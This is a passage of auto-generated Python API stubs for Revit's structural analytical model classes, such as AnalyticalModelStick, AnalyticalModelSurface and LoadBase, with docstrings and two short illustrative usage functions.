start: Member Forces position on analytical model stick element. True for start, false for end. Returns: True if member forces for provided position were removed, false otherwise. """ pass def SetAlignmentMethod(self, selector, method): """ SetAlignmentMethod(self: AnalyticalModelStick, selector: AnalyticalElementSelector, method: AnalyticalAlignmentMethod) Sets the alignment method for a given selector. selector: End of the analytical model. method: The alignment method at a given end. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetMemberForces(self, *__args): """ SetMemberForces(self: AnalyticalModelStick, start: bool, force: XYZ, moment: XYZ) Adds Member Forces to element. start: Member Forces position on analytical model stick element. True for start, false for end. force: The translational forces at specified position of the element. The x value of XYZ object represents force along x-axis of the analytical model coordinate system, y along y-axis, z along z-axis respectively. moment: The rotational forces at specified position of the element. The x value of XYZ object represents moment about x-axis of the analytical model coordinate system, y about y-axis, z about z-axis respectively. SetMemberForces(self: AnalyticalModelStick, memberForces: MemberForces) Sets Member Forces to element. memberForces: End to which member forces will be added is defined by setting Autodesk::Revit::DB::Structure::MemberForces::Position property in provided Member Forces object. """ pass def SetProjection(self, selector, *__args): """ SetProjection(self: AnalyticalModelStick, selector: AnalyticalElementSelector, planeIdY: ElementId, projectionZ: StickElementProjectionZ) Sets the analytical model projection to a preset value. selector: End of the analytical model. planeIdY: Plane on to which analytical model may be projected in Y direction. Plane identifies a Level, a Grid, or a Ref Plane. projectionZ: Preset value for Analytical Model Stick projection Z. SetProjection(self: AnalyticalModelStick, selector: AnalyticalElementSelector, projectionY: StickElementProjectionY, projectionZ: StickElementProjectionZ) Sets the analytical model projection to a preset value. selector: End of the analytical model. projectionY: Preset value for Analytical Model Stick projection Y. projectionZ: Preset value for Analytical Model Stick projection Z. SetProjection(self: AnalyticalModelStick, selector: AnalyticalElementSelector, planeIdY: ElementId, planeIdZ: ElementId) Sets the analytical model projection to a preset value. selector: End of the analytical model. planeIdY: Plane on to which analytical model may be projected in Y direction. Plane identifies a Level, a Grid, or a Ref Plane. planeIdZ: Plane on to which analytical model may be projected in Z direction. Plane identifies a Level, a Grid, or a Ref Plane. SetProjection(self: AnalyticalModelStick, selector: AnalyticalElementSelector, projectionY: StickElementProjectionY, planeIdZ: ElementId) Sets the analytical model projection to a preset value. selector: End of the analytical model. projectionY: Preset value for Analytical Model Stick projection Y. planeIdZ: Plane on to which analytical model may be projected in Z direction. Plane identifies a Level, a Grid, or a Ref Plane. 
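# --- Usage sketch (illustrative example, not part of the generated stubs) ---
# Applies member forces to one end of an analytical stick element and reports
# its release types, using SetMemberForces / GetReleaseType documented above
# (SetReleases follows just below).  Assumptions: `doc` is the active Document
# and `stick` is an AnalyticalModelStick, e.g. obtained from a structural beam
# via Element.GetAnalyticalModel().  Force values are in Revit internal units.
def _example_set_end_forces(doc, stick):
    from Autodesk.Revit.DB import Transaction, XYZ
    t = Transaction(doc, "Set member forces")
    t.Start()
    # True = start of the stick; force and moment components follow the
    # analytical model coordinate system (x longitudinal, y/z transversal).
    stick.SetMemberForces(True, XYZ(0, 0, -1000.0), XYZ(0, 0, 0))
    t.Commit()
    print("start release type:", stick.GetReleaseType(True))
    print("end release type:", stick.GetReleaseType(False))
    print("member force records:", stick.GetMemberForces().Count)
# ---------------------------------------------------------------------------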
""" pass def SetReleases(self, start, fx, fy, fz, mx, my, mz): """ SetReleases(self: AnalyticalModelStick, start: bool, fx: bool, fy: bool, fz: bool, mx: bool, my: bool, mz: bool) Sets the releases of element. start: The position on analytical model stick element. True for start, false for end. """ pass def SetReleaseType(self, start, releaseType): """ SetReleaseType(self: AnalyticalModelStick, start: bool, releaseType: ReleaseType) Sets the release type. start: The position on analytical model stick element. True for start, false for end. releaseType: The type of release. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class AnalyticalModelColumn(AnalyticalModelStick, IDisposable): """ An element that represents the structural analytical model column. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass BaseExtension = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The base extension option. Get: BaseExtension(self: AnalyticalModelColumn) -> StickElementExtension Set: BaseExtension(self: AnalyticalModelColumn) = value """ BaseExtensionMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The bottom extension method option. Get: BaseExtensionMethod(self: AnalyticalModelColumn) -> AnalyticalAlignmentMethod Set: BaseExtensionMethod(self: AnalyticalModelColumn) = value """ BaseExtensionPlaneId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The bottom extension plane ID option. Get: BaseExtensionPlaneId(self: AnalyticalModelColumn) -> ElementId Set: BaseExtensionPlaneId(self: AnalyticalModelColumn) = value """ TopExtension = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension option. Get: TopExtension(self: AnalyticalModelColumn) -> StickElementExtension Set: TopExtension(self: AnalyticalModelColumn) = value """ TopExtensionMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension method option. 
Get: TopExtensionMethod(self: AnalyticalModelColumn) -> AnalyticalAlignmentMethod Set: TopExtensionMethod(self: AnalyticalModelColumn) = value """ TopExtensionPlaneId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension plane ID option. Get: TopExtensionPlaneId(self: AnalyticalModelColumn) -> ElementId Set: TopExtensionPlaneId(self: AnalyticalModelColumn) = value """ class AnalyticalModelSelector(object, IDisposable): """ Defines a portion of an Analytical Model for an Element. AnalyticalModelSelector(curve: Curve) AnalyticalModelSelector(curve: Curve, inCurveSelector: AnalyticalCurveSelector) AnalyticalModelSelector() AnalyticalModelSelector(inCurveSelector: AnalyticalCurveSelector) """ def Dispose(self): """ Dispose(self: AnalyticalModelSelector) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: AnalyticalModelSelector, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, *__args): """ __new__(cls: type, curve: Curve) __new__(cls: type, curve: Curve, inCurveSelector: AnalyticalCurveSelector) __new__(cls: type) __new__(cls: type, inCurveSelector: AnalyticalCurveSelector) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass CurveSelector = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The portion of the curve to be selected. Get: CurveSelector(self: AnalyticalModelSelector) -> AnalyticalCurveSelector Set: CurveSelector(self: AnalyticalModelSelector) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: AnalyticalModelSelector) -> bool """ class AnalyticalModelSketchComponent(object, IDisposable): """ This is one component of an AnalyticalModelSketch, which exists to provide greater granularity over the Analytical Model than at the Element level. """ def Dispose(self): """ Dispose(self: AnalyticalModelSketchComponent) """ pass def EnableAutoDetect(self): """ EnableAutoDetect(self: AnalyticalModelSketchComponent) Enables Auto-detect on Sketch Component. """ pass def GetAnalyticalAlignmentMethod(self): """ GetAnalyticalAlignmentMethod(self: AnalyticalModelSketchComponent) -> AnalyticalAlignmentMethod Retrieves Analytical Alignment Method preset for Sketch Component. Returns: Indicates whether Alignment Method is at Auto-Detect or Projection """ pass def GetAnalyticalProjectionDatumPlane(self): """ GetAnalyticalProjectionDatumPlane(self: AnalyticalModelSketchComponent) -> ElementId Retrieves Datum Plane ElementId for Analytical Projection Returns: Represents Datum used for Analytical Projection, if Analytical Projection Type indicates that a Datum Plane is to be used. Otherwise, invalidElementId is returned. 
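# --- Usage sketch (illustrative example, not part of the generated stubs) ---
# Builds an AnalyticalModelSelector for the start point of an element's single
# analytical curve and resolves it to a Reference via GetReference(), e.g. for
# use as a ManuallyAdjust() source.  Assumptions: `element` exposes a single-
# curve analytical model; AnalyticalCurveSelector.StartPoint is assumed to be
# a valid member of the AnalyticalCurveSelector enumeration.
def _example_reference_at_start(element):
    from Autodesk.Revit.DB.Structure import AnalyticalModelSelector, AnalyticalCurveSelector
    am = element.GetAnalyticalModel()
    if am is None or not am.IsSingleCurve():
        return None
    selector = AnalyticalModelSelector(am.GetCurve(), AnalyticalCurveSelector.StartPoint)
    if not am.IsValidSelector(selector):
        return None
    return am.GetReference(selector)
# ---------------------------------------------------------------------------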
""" pass def GetAnalyticalProjectionType(self): """ GetAnalyticalProjectionType(self: AnalyticalModelSketchComponent) -> AnalyticalProjectionType Retrieves Analytical Projection Type preset for Sketch Component. Returns: Indicates whether Analytical Projection is at a preset, or refers to a Datum. """ pass def GetAutoDetectMatchedElements(self): """ GetAutoDetectMatchedElements(self: AnalyticalModelSketchComponent) -> ICollection[ElementId] Retrieves ElementIds that Sketch Component is Auto-detecting against. Returns: Set of ElementIds that Sketch Component is auto-detecting against. """ pass def GetComponentElementId(self): """ GetComponentElementId(self: AnalyticalModelSketchComponent) -> ElementId Retrieves ElementId of Sketch Component, if such an operation makes sense. Returns: ElementId of Sketch Component. If the operation does not make sense (perhaps because the Sketch abstraction does not translate one-to-one to ElementIds), then this will return invalidElementId. """ pass def IsAutoDetectEnabled(self): """ IsAutoDetectEnabled(self: AnalyticalModelSketchComponent) -> bool Indicates whether Auto-detect is enabled on the given Sketch component. Returns: True if Auto-detect is enabled, false otherwise. """ pass def IsValidAnalyticalAlignmentMethod(self, alignmentMethod): """ IsValidAnalyticalAlignmentMethod(self: AnalyticalModelSketchComponent, alignmentMethod: AnalyticalAlignmentMethod) -> bool Indicates whether Analytical Alignment Method is valid for Sketch Component. alignmentMethod: Analytical Alignment Method preset to test for validity. Returns: True means alignment method is valid, false otherwise. """ pass def IsValidAnalyticalProjectionType(self, projectionType): """ IsValidAnalyticalProjectionType(self: AnalyticalModelSketchComponent, projectionType: AnalyticalProjectionType) -> bool Indicates whether Analytical Projection Type is valid for Sketch Component. projectionType: Analytical Projection Type preset to test for validity. Returns: True is projection type is valid, false otherwise. """ pass def IsValidDatumPlaneForProjection(self, datumPlaneId): """ IsValidDatumPlaneForProjection(self: AnalyticalModelSketchComponent, datumPlaneId: ElementId) -> bool Indicates whether Datum Plane is valid Analytical Projection of Sketch Component. datumPlaneId: ElementId identifying Datum Plane. Returns: True if Datum Plane is valid; false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: AnalyticalModelSketchComponent, disposing: bool) """ pass def SetAnalyticalAlignmentMethod(self, alignmentMethod): """ SetAnalyticalAlignmentMethod(self: AnalyticalModelSketchComponent, alignmentMethod: AnalyticalAlignmentMethod) Sets the Alignment Method to the supplied Analytical Alignment Method alignmentMethod: Analytical Alignment Method which the Analytical Model should use for alignment. """ pass def SetAnalyticalProjectionDatumPlane(self, datumPlaneId): """ SetAnalyticalProjectionDatumPlane(self: AnalyticalModelSketchComponent, datumPlaneId: ElementId) Sets the Analytical Projection to supplied Datum Plane. datumPlaneId: Identifies Datum Plane ElementId. """ pass def SetAnalyticalProjectionType(self, projectionType): """ SetAnalyticalProjectionType(self: AnalyticalModelSketchComponent, projectionType: AnalyticalProjectionType) Sets the Analytical Projection to the supplied Analytical Projection Type. projectionType: Analytical Projection Type to which the Analytical Model should project. 
""" pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: AnalyticalModelSketchComponent) -> bool """ class AnalyticalModelSupport(object, IDisposable): """ Represents one support for an Element, in the realm of the Analytical Model. """ def Dispose(self): """ Dispose(self: AnalyticalModelSupport) """ pass def GetCurve(self): """ GetCurve(self: AnalyticalModelSupport) -> Curve Retrieves the curve providing support. Returns: Represents the curve providing support, if the Support Type is Curve Support. """ pass def GetFace(self): """ GetFace(self: AnalyticalModelSupport) -> Face Retrieves surface providing support, Returns: Surface representing the surface providing support, if the Support Type is Surface Support. """ pass def GetPoint(self): """ GetPoint(self: AnalyticalModelSupport) -> XYZ Retrieves the point providing support. Returns: Represents the point providing support, if the Support Type is Point Support. """ pass def GetPriority(self): """ GetPriority(self: AnalyticalModelSupport) -> AnalyticalSupportPriority Retrieves the priority of the support provided. Returns: Indicates the support priority, as determined by Analytical Support Checking """ pass def GetSupportingElement(self): """ GetSupportingElement(self: AnalyticalModelSupport) -> ElementId Retrieves the actual Element Id providing support. Returns: Represents Element that provides support. """ pass def GetSupportType(self): """ GetSupportType(self: AnalyticalModelSupport) -> AnalyticalSupportType Gets the type of support provided. Returns: Indicates type of support provided. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: AnalyticalModelSupport, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: AnalyticalModelSupport) -> bool """ class AnalyticalModelSurface(AnalyticalModel, IDisposable): """ An element that represents a surface in the structural analytical model. 
""" def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetHiddenOpenings(self, openingsIds): """ GetHiddenOpenings(self: AnalyticalModelSurface) -> ICollection[ElementId] """ pass def GetLocalCoordinateSystem(self, point=None): """ GetLocalCoordinateSystem(self: AnalyticalModelSurface, point: XYZ) -> Transform Gets the local coordinate system (LCS) reflects analytical model orientation at the specified point. point: The point on the analytical model surface element. Returns: Transformation matrix. x - longitudinal axis, y - transversal, section - horizontal, strong axis, z - transversal, section - vertical, weak axis, origin - base point of LCS. """ pass def GetLoops(self, loopType): """ GetLoops(self: AnalyticalModelSurface, loopType: AnalyticalLoopType) -> IList[CurveLoop] Retrieves Analytical Model Loops with respect to the loopType. Returns: Loops that satisfy loopType criteria are returned. """ pass def GetOpeningLoops(self, openingId): """ GetOpeningLoops(self: AnalyticalModelSurface, openingId: ElementId) -> IList[CurveLoop] Retrieves Array of CurveLoops of Analytical Surface Opening.. Only valid openings for hide are allowed. openingId: Identifies which Opening creates the CurveLoop in the analytical surface. Returns: Array of CurveLoops associated with Opening. """ pass def GetOpenings(self, openingsIds): """ GetOpenings(self: AnalyticalModelSurface) -> ICollection[ElementId] """ pass def GetPlane(self): """ GetPlane(self: AnalyticalModelSurface) -> Plane Returns plane on which Analytical Model Surface Element is lying. Only planar surface elements are valid for this function. Returns: Plane object on which Analytical Model is projected. """ pass def HasOpenings(self): """ HasOpenings(self: AnalyticalModelSurface) -> bool Checks if the analytical model surface have any openings. Returns: True if Analytical Surface Element contains any openings (included invalid for hide). """ pass def HideOpening(self, openingId): """ HideOpening(self: AnalyticalModelSurface, openingId: ElementId) -> bool Hides set of curves originating from Opening. openingId: Opening to hide in analytical surface. Returns: True if given opening was hidden (operation was successful). """ pass def IsOpeningHidden(self, openingId): """ IsOpeningHidden(self: AnalyticalModelSurface, openingId: ElementId) -> bool Returns true if opening with given Identifier is hidden. openingId: Identifier of opening to check. Returns: True for openings which are hidden, false for all other Identifiers. """ pass def IsPlanar(self): """ IsPlanar(self: AnalyticalModelSurface) -> bool Indicates if the Analytical Model Surface Element is planar. Returns: True if Analytical Model Surface Element is planar, false otherwise. """ pass def IsValidOpeningForHide(self, openingId): """ IsValidOpeningForHide(self: AnalyticalModelSurface, openingId: ElementId) -> bool Returns true if opening with given Identifier could be hidden, false for all other Identifiers. openingId: Identifier of opening to check. Returns: True for openings which are valid to be hidden, false for all other Identifiers. 
""" pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetLoops(self, loopType, newLoops): """ SetLoops(self: AnalyticalModelSurface, loopType: AnalyticalLoopType, newLoops: IList[CurveLoop]) -> bool """ pass def ShowOpening(self, openingId): """ ShowOpening(self: AnalyticalModelSurface, openingId: ElementId) -> bool Shows previously hidden set of curves originating from Opening. openingId: Opening to show in analytical surface. Returns: True if given opening was shown (operation was successful). """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass AlignmentMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The alignment method option. Get: AlignmentMethod(self: AnalyticalModelSurface) -> AnalyticalAlignmentMethod Set: AlignmentMethod(self: AnalyticalModelSurface) = value """ BottomExtension = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The bottom extension option. Get: BottomExtension(self: AnalyticalModelSurface) -> SurfaceElementExtension Set: BottomExtension(self: AnalyticalModelSurface) = value """ BottomExtensionMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The bottom extension method option. Get: BottomExtensionMethod(self: AnalyticalModelSurface) -> AnalyticalAlignmentMethod Set: BottomExtensionMethod(self: AnalyticalModelSurface) = value """ BottomExtensionPlaneId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The bottom extension plane ID option. Get: BottomExtensionPlaneId(self: AnalyticalModelSurface) -> ElementId Set: BottomExtensionPlaneId(self: AnalyticalModelSurface) = value """ HasExtension = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the element supports an extension option. Get: HasExtension(self: AnalyticalModelSurface) -> bool """ ProjectionPlaneZ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Z projection option. Get: ProjectionPlaneZ(self: AnalyticalModelSurface) -> ElementId Set: ProjectionPlaneZ(self: AnalyticalModelSurface) = value """ ProjectionZ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Z projection option. Get: ProjectionZ(self: AnalyticalModelSurface) -> SurfaceElementProjectionZ Set: ProjectionZ(self: AnalyticalModelSurface) = value """ TopExtension = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension option. 
Get: TopExtension(self: AnalyticalModelSurface) -> SurfaceElementExtension Set: TopExtension(self: AnalyticalModelSurface) = value """ TopExtensionMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension method option. Get: TopExtensionMethod(self: AnalyticalModelSurface) -> AnalyticalAlignmentMethod Set: TopExtensionMethod(self: AnalyticalModelSurface) = value """ TopExtensionPlaneId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The top extension plane ID option. Get: TopExtensionPlaneId(self: AnalyticalModelSurface) -> ElementId Set: TopExtensionPlaneId(self: AnalyticalModelSurface) = value """ class AnalyticalProjectionType(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Projection. Combined with AnalyticalDirection, this abstracts Analytical Projections for all Structural Elements enum AnalyticalProjectionType, values: AutoDetect (5), Bottom (2), Center (1), CenterOfCore (11), DatumPlane (8), Default (10), Invalid (6), LocationLine (12), NotApplicable (9), SideOne (3), SideTwo (4), SketchCurve (7), Top (0), Varies (13) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass AutoDetect = None Bottom = None Center = None CenterOfCore = None DatumPlane = None Default = None Invalid = None LocationLine = None NotApplicable = None SideOne = None SideTwo = None SketchCurve = None Top = None value__ = None Varies = None class AnalyticalRigidLinksOption(Enum, IComparable, IFormattable, IConvertible): """ Specifies how Rigid Links will be made for the Analytical Model. enum AnalyticalRigidLinksOption, values: Disabled (1), Enabled (0), FromColumn (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Disabled = None Enabled = None FromColumn = None value__ = None class AnalyticalSupportChecking(object): """ Utilities that allow for detection of incorrect or incomplete analytical supports. """ @staticmethod def CheckMemberSupports(document, progressIndicatorText): """ CheckMemberSupports(document: Document, progressIndicatorText: str) -> bool Check if the document contains unsupported Structural Elements. document: Document in which to perform Analytical Support Check. progressIndicatorText: Text to display on progress indicator. Returns: True if the support check succeeded, false otherwise. """ pass __all__ = [ 'CheckMemberSupports', ] class AnalyticalSupportPriority(Enum, IComparable, IFormattable, IConvertible): """ Defines how "highly" another Element is giving support for one Element. enum AnalyticalSupportPriority, values: FourthHigestPriority (4), HighestPriority (1), SecondHighestPriority (2), ThirdHighestPriority (3), UnknownPriority (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass FourthHigestPriority = None HighestPriority = None SecondHighestPriority = None ThirdHighestPriority = None UnknownPriority = None value__ = None class AnalyticalSupportType(Enum, IComparable, IFormattable, IConvertible): """ Indicates what kind of support another Element provides -- Point, Surface, or Curve. enum AnalyticalSupportType, values: CurveSupport (2), PointSupport (1), SurfaceSupport (3), UnknownSupport (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass CurveSupport = None PointSupport = None SurfaceSupport = None UnknownSupport = None value__ = None class AnalyzeAs(Enum, IComparable, IFormattable, IConvertible): """ Analyze As has various functions within the Analytical Model, and is Element-dependent. "Not for Analysis" usually means that there will not be an Analytical Model generated. The others indicate how the Analytical Model behavior will treat the Element in question. For instance "Hanger" columns have different support expectations than "Gravity" columns. enum AnalyzeAs, values: Gravity (1), GravityLateral (10), Hanger (0), Lateral (2), Mat (4), NotApplicable (8), NotForAnalysis (7), SlabOneWay (3), SlabOnGrade (5), SlabTwoWay (9) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Gravity = None GravityLateral = None Hanger = None Lateral = None Mat = None NotApplicable = None NotForAnalysis = None SlabOneWay = None SlabOnGrade = None SlabTwoWay = None value__ = None class LoadBase(Element, IDisposable): """ The LoadBase object is the base class for all load objects within the Autodesk Revit API. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def IsOrientToPermitted(self, orientTo): """ IsOrientToPermitted(self: LoadBase, orientTo: LoadOrientTo) -> bool Indicates if the provided orientation is permitted for this load. orientTo: Load orientation to check. Returns: True if provided orientation type is permitted for this load, false if not. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass HostElement = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The host element for the load. Get: HostElement(self: LoadBase) -> AnalyticalModel """ HostElementId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The host element ID for the load. Get: HostElementId(self: LoadBase) -> ElementId """ IsHosted = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the Load is hosted or non-hosted. Get: IsHosted(self: LoadBase) -> bool """ IsReaction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The load is reaction option. Get: IsReaction(self: LoadBase) -> bool Set: IsReaction(self: LoadBase) = value """ LoadCase = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The load case for the load. Get: LoadCase(self: LoadBase) -> LoadCase """ LoadCaseId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The load case ID for the load. Get: LoadCaseId(self: LoadBase) -> ElementId Set: LoadCaseId(self: LoadBase) = value """ LoadCaseName = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The name of the load case to which this load belongs. Get: LoadCaseName(self: LoadBase) -> str """ 